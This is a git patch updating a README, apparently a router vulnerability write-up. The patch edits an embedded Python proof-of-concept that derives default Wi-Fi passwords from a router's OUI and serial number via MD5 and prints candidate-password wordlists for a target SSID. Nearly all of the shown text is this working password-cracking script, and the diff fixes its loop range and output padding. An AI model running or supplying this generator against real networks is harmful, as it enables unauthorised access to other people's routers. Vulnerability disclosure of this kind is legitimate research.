From 353e48ce7376ee7fbfe7a4713aac57487745f9e6 Mon Sep 17 00:00:00 2001
From: nico
Date: Wed, 6 May 2020 20:01:57 +0000
Subject: [PATCH] Update 'Readme.md'

---
 Readme.md | 35 ++++++++++++++++++-----------------
 1 file changed, 18 insertions(+), 17 deletions(-)

diff --git a/Readme.md b/Readme.md
index 3163bd4..8690581 100644
--- a/Readme.md
+++ b/Readme.md
@@ -493,28 +493,28 @@ With this information we can write a PoC script that can produce a wordlist to e
 import argparse, base64, hashlib, re
 
 def genpwd_longpasswd(oui, serialnum):
- def str2md5(string):
- m = hashlib.md5()
- m.update(string.encode("ascii"))
- return m.digest()
+ def str2md5(string):
+ m = hashlib.md5()
+ m.update(string.encode("ascii"))
+ return m.digest()
 
- #secret1 = "%s-ALCL%s" % (oui, serialnum)
- secret2 = "%s-01%u" % (oui, int(serialnum, 16))
+ #secret1 = "%s-ALCL%s" % (oui, serialnum)
+ secret2 = "%s-01%u" % (oui, int(serialnum, 16))
 
- #md5_secret1 = str2md5(secret1)
- md5_secret2 = str2md5(secret2)
+ #md5_secret1 = str2md5(secret1)
+ md5_secret2 = str2md5(secret2)
 
- #wanpasswd = base64.b32encode(bytes(bytearray(md5_secret1[:16] + md5_secret2[:3]))).decode("ascii")[:30]
+ #wanpasswd = base64.b32encode(bytes(bytearray(md5_secret1[:16] + md5_secret2[:3]))).decode("ascii")[:30]
 
- lower = upper = 0
+ lower = upper = 0
 
- for i in range(8):
- upper = (lower >> 0x18 | ((upper << 8)&0xffffffff))&0xffffffff
- lower = (((lower << 8)&0xffffffff) | md5_secret2[i + 8])&0xffffffff
+ for i in range(8):
+ upper = (lower >> 0x18 | ((upper << 8)&0xffffffff))&0xffffffff
+ lower = (((lower << 8)&0xffffffff) | md5_secret2[i + 8])&0xffffffff
 
- longpasswd = ((upper<<32)+lower)%0x2540be400
+ longpasswd = ((upper<<32)+lower)%0x2540be400
 
- return longpasswd
+ return longpasswd
 
 parser = argparse.ArgumentParser(prog="poc", description="A poc script to efficiently crack vulnerable routers")
 parser.add_argument("ssid", type=str, help="the ssid to attack")
@@ -551,8 +551,9 @@ for s in ssids:
 serialBytes = args.ssid
 for r in s.split("[A-F0-9]{4}"):
 serialBytes = serialBytes.replace(r, "")
- for i in range(0xffff):
- print(genpwd_longpasswd(oui, "{:04x}{}".format(i, serialBytes)))
+ for i in range(0xffff + 1):
+ candidate = genpwd_longpasswd(oui, "{:04x}{}".format(i, serialBytes))
+ print(f"{candidate:010}")
 break
 ```